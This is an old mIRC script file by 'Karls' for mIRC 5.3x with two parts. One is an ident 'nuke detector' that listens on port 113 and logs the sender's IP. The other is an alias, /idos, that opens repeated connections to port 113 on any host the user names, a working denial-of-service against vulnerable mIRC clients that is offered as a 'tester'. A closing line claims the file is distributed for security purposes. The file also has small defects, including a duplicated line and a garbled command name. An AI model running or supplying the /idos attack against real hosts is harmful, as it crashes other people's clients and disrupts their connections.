[script]
n0=#Karls mIRC 5.3x nuke detector b2  and tester
n1=#Send your comments or bugs to kss@usa.net or talk to  me on Undernet with /msg Karls
n2=#----------------------------------------------------------
n3=#NOTE: YOU NEED mIRC 5.3 or 5.31 to use ALL the following scripts.
n4=#NOTE2:Without wanting I found other bug on mIRC, the on socklisten don't tell you the ip of the person
n5=#who sent the request, but your ip :o). So.. I made this script to accept the ident request,
n6=#it'll tell you the ip of the nuker when the nuker closes the connection.
n7=#---------------------------------------------------------
n8=#This script will open port 113 to detect any identd requests, be sure to be running mIRC 5.3 or 5.31.
n9=#If you want to get protected against identd nukers just type    /identd off
n10=#Usage: To start the identd nuke detector type    /load -rs ident.ini    to load this file in your mIRC .
n11=#Type    /identd off    to close the mIRC identd server
n12=#And    /cidos on   to start the new nuke detector. To close the detector type /cidos off
n13=
n14=alias cidos {
n15=if ($1 == on) { socklisten ident 113 | echo 4 $active @POWerSocKETs@ Karls mIRC 5.3x nuke detector loaded! }
n16=if ($1 == off) { sockclose ident | echo 4 $active @POWerSocKETs@ Karls mIRC 5.3x nuke detector was closed. }
n17=if (($1 != off) && ($1 != on)) echo 4 $active @POWerSocKETs@ Usage /cidos on|off
n18=}
n19=
n20=on 1:socklisten:ident: {
n21=  if ($sockerr > 0) return
n21=  if ($sockerr > 0) return
n22=  sockaccept $sockname $+ $rand(1,10000)
n23=}
n24=on 1:sockclose:ident*: {
n25=if ($sockerr > 0) return
n26=echo 4 $active @POWerSocKETs@ $sock($sockname).ip Sent you an ident request
n27=}
n28=#This script was made to show the mIRC 5.3x bug just type    /idos host   to stop if type /idos off
n29=#You need to load this script using mIRC 5.3 or 5.31
n30=
n31=alias idos {
n32=if ($1 == off) { sockclose bug* | echo 4 $active @POWerSocKETs@ Connections closed }
n33=if (($1 != off) && (. !isin $1)) { echo 4 $active @POWerSocKETs@ Usage: /idos host|off | halt }
n34=if ($1 != off) { echo 4 $active @POWerSocKETs@ Sending ident requests to $1
n35=sockopen bug $+ $rand(1,10000) $1 113 | sockopen bug $+ $rand(1,10000) $1 113 | sockopen bug $+ $rand(1,10000) $1 113 | sockopen bug $+ $rand(1,10000) $1 113 | sockopen bug $+ $rand(1,10000) $1 113 | sockopen bug $+ $rand(1,10000) $1 113 | sockopen bug $+ $rand(1,10000) $1 113
n36=}
n37=}
n38=on 1:sockclose:bug*: {
n39=if ($sockerr > 0) return
n40=echo 4 $active @POWerSocKETs@ Connection to $sock($sockname).name $sock($sockname).ip was lost. Type    /idosnhost to send another request.
n41=}
n42=# Script feito por: Karls
n43=# Apenas distribuido para fins de seguranca por RWX

